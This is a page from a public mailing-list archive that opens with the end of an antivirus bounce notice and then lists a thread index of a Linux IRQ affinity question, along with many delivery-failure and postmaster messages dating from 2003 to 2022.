Appropriate action has been taken to clean, strip off , quarantine, or delete the virus or macro.  No further action is required at this time.

---------------------------------------------------------

[-- Attachment #3.1.2: Type: text/plain, Size: 45 bytes --]

Please see the attached zip file for details.

^ permalink raw reply	[flat|nested] 183+ messages in thread

end of thread, other threads:[~2022-06-09 22:56 UTC | newest]

Thread overview: 183+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2018-05-11 11:34 Not able to set smp_affinity for an IRQ on i.MX7 Pintu Kumar
2018-05-11 11:34 ` Pintu Kumar
     [not found] ` <5af57fea.1c69fb81.885f0.2377.GMRIR@mx.google.com>
2018-05-11 11:37   ` Delivery Status Notification (Failure) Pintu Kumar
2018-05-11 11:37     ` Pintu Kumar
2018-05-11 11:37     ` Pintu Kumar
2018-05-11 12:39     ` Russell King - ARM Linux
2018-05-11 12:39       ` Russell King - ARM Linux
2018-05-11 13:04       ` Lucas Stach
2018-05-11 13:04         ` Lucas Stach
2018-05-11 13:04         ` Lucas Stach
2018-05-11 14:37         ` Pintu Kumar
2018-05-11 14:37           ` Pintu Kumar
2018-05-11 14:37           ` Pintu Kumar
2018-05-14 12:12           ` Pintu Kumar
2018-05-14 12:12             ` Pintu Kumar
2018-05-14 12:12             ` Pintu Kumar
2018-05-14 13:11             ` Lucas Stach
2018-05-14 13:11               ` Lucas Stach
2018-05-14 13:11               ` Lucas Stach
2018-05-14 14:28               ` Pintu Kumar
2018-05-14 14:28                 ` Pintu Kumar
2018-05-14 14:28                 ` Pintu Kumar
2018-05-17 13:28                 ` Pintu Kumar
2018-05-17 13:28                   ` Pintu Kumar
2018-05-17 13:28                   ` Pintu Kumar
2018-05-21 18:51                   ` Pintu Kumar
2018-05-21 18:51                     ` Pintu Kumar
2018-05-21 18:51                     ` Pintu Kumar
  -- strict thread matches above, loose matches on Subject: below --
2022-06-09 21:08 postmaster
     [not found] <CAFF4x5LfJ7qY73JE-=mah5vx9PdeNhc0i0X6kQohPpvDTCd3Sw@mail.gmail.com>
     [not found] ` <5cff8197.1c69fb81.4940.6de6.GMR@mx.google.com>
2019-06-11 10:29   ` Xeno Amess
     [not found] <5c62b41d.1c69fb81.fe791.877b@mx.google.com>
     [not found] ` <CAFacdQ-soWD176VHgd+raHaV=VPpzKXrDrLFavPcNEoewZwBYA@mail.gmail.com>
     [not found]   ` <5c657002.1c69fb81.d433c.32ce.GMR@mx.google.com>
2019-02-18 10:46     ` Senol Yazici
2019-02-18 16:12       ` Randall S. Becker
2019-02-18 20:59       ` Johannes Schindelin
2019-02-19  1:08         ` Jason Pyeron
2018-10-29 16:50 [PATCH] fstest: CrashMonkey tests ported to xfstest Jayashree Mohan
2018-11-04 16:38 ` Eryu Guan
2018-11-04 20:21   ` Jayashree Mohan
2018-11-05  5:22     ` Dave Chinner
2018-11-05 20:16       ` Jayashree Mohan
2018-11-06 23:15         ` Theodore Y. Ts'o
2018-11-06 23:39           ` Dave Chinner
     [not found]             ` <CA+EzBbDwdi26MCswz0iQ8hUTcGixATUXayxMOmEw5gekYvmMuw@mail.gmail.com>
     [not found]               ` <5be228d2.1c69fb81.3ad08.5e76.GMR@mx.google.com>
2018-11-06 23:54                 ` Delivery Status Notification (Failure) Jayashree Mohan
2017-11-23 18:51 Problem installing Git Phil Martel
2017-11-23 21:30 ` Igor Djordjevic
     [not found]   ` <001a1148fe243ade02055ead2599@google.com>
2017-11-23 21:41     ` Delivery Status Notification (Failure) Igor Djordjevic
2017-10-06 10:25 "BTRFS error (device vda1): couldn't get super buffer head for bytenr x" Nick Gilmour
2017-10-07  0:08 ` Liu Bo
2017-10-08 15:39   ` Nick Gilmour
2017-10-08 21:03     ` Chris Murphy
     [not found]       ` <CAH-drozNA1N6xO2dAknLD-JQu75BAEi+GpiEibA-R-Zk1U7xmA@mail.gmail.com>
2017-10-09  9:28         ` Chris Murphy
     [not found]           ` <CAH-drozVaiXMoXqs8hiHvd5n8qDvbGLnp=1OPndsibhxjGkNxw@mail.gmail.com>
     [not found]             ` <59df4db2.8508370a.40c79.2c64.GMRIR@mx.google.com>
2017-10-12 11:12               ` Delivery Status Notification (Failure) Nick Gilmour
2017-06-10 23:36 f4da1594
2017-06-09  8:26 f4da1594
2017-06-09  8:25 f4da1594
2017-06-09  8:16 f4da1594
2017-05-16 23:22 [Bug] git branch -v has problems with carriage returns Animi Vulpis
     [not found] ` <CA+izobutP-JY84RGG-JbPA5twbckL1uVwxknBRLVTuGG0MEJcg@mail.gmail.com>
     [not found]   ` <CA+izobuSKtoQzNJuvuisjh7h3FF=nbt8u-hOHfdeFp8ZjgZF+Q@mail.gmail.com>
     [not found]     ` <591f6844.82dcca0a.451e5.8f76.GMRIR@mx.google.com>
2017-05-19 21:51       ` Delivery Status Notification (Failure) Atousa Duprat
2017-01-19 14:04 [meta-rockchip][PATCH 0/7] introduce rockchip offical linux support to meta-rockchip Jacob Chen
2017-01-19 14:04 ` [meta-rockchip][PATCH 2/7] machine: Add machine file for the rk3288 linux Boards Jacob Chen
2017-01-27 14:37   ` Romain Perier
2017-01-27 19:41     ` Trevor Woerner
     [not found]       ` <588ba270.4c18370a.3b01f.9247.GMRIR@mx.google.com>
2017-01-27 19:46         ` Delivery Status Notification (Failure) Trevor Woerner
     [not found] <CAP1NbjmewVTQ6KbY7fkgdhJ6iMSg0tO9g1P6Usymi3EmfmVA8w@mail.gmail.com>
     [not found] ` <089e010d935cc850e4052a580ec2@google.com>
2016-01-27 22:25   ` André Vitor
     [not found] <047d7b5dbb76a0065405207cfe24@google.com>
2015-09-24 12:03 ` Fwd: " Naveen
2015-09-24 13:09   ` Jiri Benc
2015-06-19  4:39 Mail Delivery Subsystem
2015-03-23  5:27 Sysfs requirement for running generic_buffer.c application - IIO sensors s.rawat
     [not found] ` <001a114904d6cd775e0511edee6f@google.com>
2015-03-23  5:44   ` Delivery Status Notification (Failure) s.rawat
     [not found] <CAFAMDXb-_8WAMw7qOdAyJQKuLwtg+kAYOJO7xivCq7OTMyB26Q@mail.gmail.com>
     [not found] ` <047d7b2ed8ab924fe60510bc0ea0@google.com>
2015-03-08  0:36   ` Amate Yolande
2015-03-01  9:46 Mail Delivery System
2015-02-28  4:14 Mail Delivery System
2015-01-29  6:34 Mail Delivery Subsystem
     [not found] <CACsJT9OOBcYNhNG6=+Q2EE4VHEvJ8_rJ3fr6gb9_3P4KpPPX3g@mail.gmail.com>
     [not found] ` <f46d043c061e8dd5c9050cb5990c@google.com>
2015-01-15 19:34   ` Mike Purvis
2015-01-15 20:39     ` Pat Erley
2015-01-15 21:00       ` Mike Purvis
2015-01-15 21:07         ` Pat Erley
2015-01-15 21:13       ` Johannes Berg
2015-01-16 14:30         ` Mike Purvis
2014-11-04 20:01 postmaster-PkbjNfxxIARBDgjK7y7TUQ
2014-10-01  5:41 postmaster-fYpdDop0OZA0n/F98K4Iww
2014-09-30 18:12 postmaster-q/cFvQ9GnvMKy9bYqjDATw
     [not found] <CAPDOMVhGTywBdA9W6cfE6bNb3CiM6Ei5rUi0OySO4dM3DbKX-w@mail.gmail.com>
     [not found] ` <20cf307f30f822dc1504fffa98ec@google.com>
2014-08-06 19:07   ` Nick Krause
2014-08-06 19:29     ` Valdis.Kletnieks at vt.edu
2014-08-07  6:45       ` priyaranjan
2014-08-07 12:29         ` Pramod Gurav
2014-08-07 17:14           ` Nick Krause
2014-08-07 20:11             ` Valdis.Kletnieks at vt.edu
2014-08-07 20:33               ` Nick Krause
2014-08-05 15:03 postmaster-+dl5rZIG5bfiBhKkSJXxiPXRex20P6io
2014-08-05  6:47 Mail Delivery Subsystem
2014-07-22  7:02 postmaster-EunbckgpuBjP01IbtRslpbpzq4S04n8Q
     [not found] <CAOAoqGuLffRn8SgkB0967U0Qvg8HWnxvL5Uq4EZk7Vxw1jiSJw@mail.gmail.com>
     [not found] ` <001a11c2fcca7727e504f3e8d518@google.com>
2014-03-06  5:03   ` Jagdish Gedia
2014-03-06 15:25     ` Alan Stern
2014-02-21  8:31 Mail Delivery System
     [not found] <CAFJTrDsaq-NjLhcwHBuN1Q_zu-Q-yJkWLMUER1zVzc1=AFNM=Q@mail.gmail.com>
     [not found] ` <047d7b86e7727b700204ea828c1d@google.com>
2013-11-06 14:06   ` Matthew Minter
     [not found] <CAOna0f2V=Aw8isLVkQy9RUKT60JOq0prsXuEVQke=QRjbRWUSg@mail.gmail.com>
     [not found] ` <047d7b86daaa49592f04e3146f9d@google.com>
2013-08-04  0:51   ` Jesper Utoft
2013-06-11 18:09 postmaster-2WHbO6Ght55OhR2lhbcafA
2013-03-27  9:54 postmaster-ohsCnglPHPkmHH771XGohA
2013-03-26 23:07 postmaster-ERNa7u4uiwD/PTVKMIaDyQ
     [not found] <CAN_hzmqrrue8jif3AJv4pZwmyMpQ6u558HaRX6dQKZCF0c_H1w@mail.gmail.com>
     [not found] ` <bcaec5396b50ba47be04d7e99955@google.com>
2013-03-14 22:01   ` Harring Figueiredo
2013-03-14 22:12     ` Junio C Hamano
2013-03-14 23:36       ` Harring Figueiredo
2012-10-29  7:02 Mail Delivery Subsystem
2012-10-24  4:28 postmaster-xqsl9BtirPbEI5Av7rMDOw
     [not found] <CAGfy=6=se6CXExQyyA7TrAjUVkGqRwGL=E1wqo4h4_6ORzS-MA@mail.gmail.com>
     [not found] ` <f46d0438909985742c04cc3f658c@google.com>
2012-10-18 11:19   ` hemant surale
2012-10-29  9:27     ` hemant surale
2012-10-29 20:19       ` Dan Mick
     [not found] <CANQmPXicmUAVwHHs0VrbRd3MU_41wnv-Ant2r7c3FOuvEOuROQ@mail.gmail.com>
     [not found] ` <e89a8f235453a906b704c472eacd@google.com>
2012-07-17 11:09   ` Chen
2012-04-11 13:24 postmaster-dK7EesNU6FY
2012-04-11 13:08 postmaster-86/RSF40sML81It4hiB8CFo/9dUJfHaYQQ4Iyu8u01E
2012-04-11 13:04 postmaster-86/RSF40sMJNBHnkq6ukOFo/9dUJfHaYQQ4Iyu8u01E
2012-04-09  7:38 Mail Delivery System
2012-04-09  7:38 Mail Delivery System
2012-04-09  7:38 Mail Delivery System
2012-04-09  7:38 Mail Delivery System
2012-04-09  7:38 Mail Delivery System
2012-04-05 14:16 IBS11
2012-04-02 21:56 IBS11
2012-03-29 14:36 postmaster-Y8CQj97R1LIkmLvzuZlaBw
2012-03-29 11:20 postmaster-pEPTqz2WXgqNj9Bq2fkWzw
2012-03-28  3:36 Mail Delivery System
2012-03-22 13:47 postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr
2012-03-22 13:47 postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr
2012-03-22 13:47 postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr
2012-03-22 13:47 postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr
2012-03-22 13:47 postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr
2012-03-08 14:41 Mail Delivery System
2012-03-08  6:18 Mail Delivery System
2012-03-07 22:52 Mail Delivery System
2012-03-01 19:42 Mail Delivery Subsystem
2012-03-01 12:30 postmaster-wGBAL9bNL4J2HSIiUldxkQdIgGIafgBh
     [not found] <CAAymXMrufs69Vg=O3Kt7Ot3kYERP=55TMFiHGkV75mUFkzr74A@mail.gmail.com>
     [not found] ` <001636c927b40af7cb04ba0aca6e@google.com>
2012-02-28 19:02   ` Rajat Khanduja
2012-02-28 19:48     ` Jeff King
2012-02-28  9:22 postmaster-Oy8cep8j1bSEVqv0pETR8A
2012-02-21  2:37 postmaster-ORiaYrpEo8U
2012-01-25 16:36 postmaster-Y8CQj97R1LIkmLvzuZlaBw
2012-01-25 16:36 postmaster-Y8CQj97R1LIkmLvzuZlaBw
2011-12-21 15:44 Mail Delivery System
2011-12-21 15:44 Mail Delivery System
2011-12-21 15:44 Mail Delivery System
2011-12-21 15:44 Mail Delivery System
2011-12-21 15:44 Mail Delivery System
2011-11-30  5:20 Mail Delivery System
2011-11-18 20:10 Mail Delivery System
2011-11-18 20:10 Mail Delivery System
2011-11-18 20:10 Mail Delivery System
2011-11-18 20:10 Mail Delivery System
2011-11-17  4:47 postmaster-EsMd/MeLYiF8uUxBSJOaYoYkZiVZrdSR2LY78lusg7I
2011-11-15 18:46 postmaster-DMvgxKAs6cU
2011-11-15 14:13 postmaster-mTV6ATcrTWY
2011-11-15 13:05 postmaster-DeuEFqYn60tmR6Xm/wNWPw
2011-11-15  9:13 postmaster-SJlmH/QgL93GjfRZg6uqBA
2011-11-15  5:29 postmaster-cK1r3kULcUuEVqv0pETR8A
2011-07-11  8:13 Mail Delivery Subsystem
     [not found] <BANLkTim5MekMVbzZE34g_V6v0QJVj7c9xA@mail.gmail.com>
     [not found] ` <000e0ce00a58298def04a6fca5b9@google.com>
2011-07-01  7:06   ` Eponymous -
2011-06-09 11:05 postmaster-pwEU/PgbHn2CsG0aXnmMvw
     [not found] <BANLkTin+Qn9FzvTJauOPVCJnk8v4ajVnSw@mail.gmail.com>
     [not found] ` <000e0cd5cff499795e04a05dc387@google.com>
2011-04-08  2:41   ` David Xu
     [not found] <AANLkTin2ZjkkFOrwo++EZw0arQnsMrqzy0drUF6WrqDm@mail.gmail.com>
     [not found] ` <20cf30564493a84040049c39612f@google.com>
2011-02-14  8:08   ` wu meng
2011-02-14  9:15     ` Jens Axboe
2010-12-09 17:01 Mail Delivery Subsystem
     [not found] <AANLkTi=+0BOUaTs73jRMnJ=9qyNkqnBvMuKVTG4od9_+@mail.gmail.com>
     [not found] ` <0022152d6729673f6a0494b1f2e6@google.com>
2010-11-10 12:25   ` miloofr
     [not found] <001636833518b9ca2e049488651a@google.com>
2010-11-08 10:52 ` J Webster
     [not found] <AANLkTine9j=PsfsOPmEWmDLUDrHCJF0MQ6X+6XJkQD0d@mail.gmail.com>
     [not found] ` <0015174c437c389602048ce7f16c@google.com>
2010-08-03  9:31   ` Simon Grönlund
     [not found] <AANLkTilb4hhy3BYp6OvpyGAe7vCQQjaPEmi12NxDdP9i@mail.gmail.com>
     [not found] ` <001485f795f4535fdd048790ecd6@google.com>
2010-05-27 12:10   ` Daniele Madama
2010-05-27 21:00     ` Luca Berra
     [not found] <1ca41c0f1003031952u7a9ea0w5adf4f0438b8fe0c@mail.gmail.com>
     [not found] ` <0016e646086875cfde0480f186a0@google.com>
2010-03-04  3:53   ` Karthik Singaram Lakshmanan
     [not found] <237044a41001312327i4ccb159aj641abc62b138fc1f@mail.gmail.com>
     [not found] ` <0016e6480ebeedd980047e84e9cc@google.com>
2010-02-01  8:14   ` tingwei liu
2010-01-29 14:17 Implement --password option for git svn perl script Laszlo Papp
     [not found] ` <001636ed7681994278047e4e4a6f@google.com>
2010-01-29 14:18   ` Fwd: Delivery Status Notification (Failure) Laszlo Papp
2010-01-29 15:04     ` Frank Li
2010-02-01 16:16       ` Laszlo Papp
2010-02-02  4:15       ` Tay Ray Chuan
2010-02-02  4:30         ` Frank Li
2010-02-02  6:37           ` Laszlo Papp
     [not found] <2cc9eb1b0910191004q1f9541d3od3163c2d80f5c835@mail.gmail.com>
     [not found] ` <0015175d06406e924104764cbc50@googlemail.com>
2009-10-19 17:08   ` fabio
2008-11-14 15:38 For review: pthread_setaffinity_np.3 Michael Kerrisk
     [not found] ` <001636c5b6831e5a44045ba80779@googlemail.com>
     [not found]   ` <001636c5b6831e5a44045ba80779-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org>
2008-11-14 15:45     ` Delivery Status Notification (Failure) Michael Kerrisk
     [not found]       ` <cfd18e0f0811140745k69075aend9686e463c9c1a4d-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
2008-11-14 15:56         ` Bert Wesarg
     [not found]           ` <36ca99e90811140756q7c445d5ei7c31c5b59df7c7a7-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
2008-11-14 16:02             ` Michael Kerrisk
     [not found]               ` <cfd18e0f0811140802i2c06e0am164648735fa7dda3-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
2008-11-14 16:26                 ` Christoph Lameter
     [not found]                   ` <Pine.LNX.4.64.0811141026080.24886-dRBSpnHQED8AvxtiuMwx3w@public.gmane.org>
2008-11-14 16:39                     ` Christoph Lameter
     [not found]                       ` <Pine.LNX.4.64.0811141038510.25195-dRBSpnHQED8AvxtiuMwx3w@public.gmane.org>
2008-11-14 16:43                         ` Michael Kerrisk
     [not found]                           ` <cfd18e0f0811140843q42971316wfade996b67aa2a6-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
2008-11-14 20:45                             ` David Rientjes
     [not found] <00c09f923a4c04465d1a677fdd7aaa@googlemail.com>
2008-02-17 16:30 ` Sisir Koppaka
     [not found] <000e0cd299d8043b9fc15979843eaf@googlemail.com>
2007-10-04  0:23 ` Robert Pajak
2007-08-03  6:22 Mail Delivery System
2007-05-31 21:26 postmaster
2007-05-18 17:46 Mail Delivery System
2006-12-05  7:09 Mail Delivery System
2005-12-05 23:50 postmaster
2005-11-23 20:37 postmaster
2005-02-13 17:37 postmaster
2004-11-30 11:17 postmaster
2004-08-03 14:02 Test Person2
2004-07-11  6:06 adsadnbs
2004-05-12 12:56 postmaster
2004-05-12  9:46 postmaster
2004-04-27 14:35 postmaster
2004-04-08  4:10 postmaster
2004-03-29 10:33 postmaster
2004-03-15 19:16 postmaster
2003-09-01 21:42 postmaster-a6Zz2GAMxShWk0Htik3J/w
2003-09-01 21:31 postmaster
2003-08-31  1:33 postmaster-GvrGQ0sgSj//MRS1mQlstNa2gSz7necR9FMPySWZwLkb1SvskN2V4Q
2003-08-27 22:58 postmaster
2003-08-21 20:59 postmaster-YNHfkfoICe87lZ9V/NTDHw
2003-07-01 14:47 postmaster

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.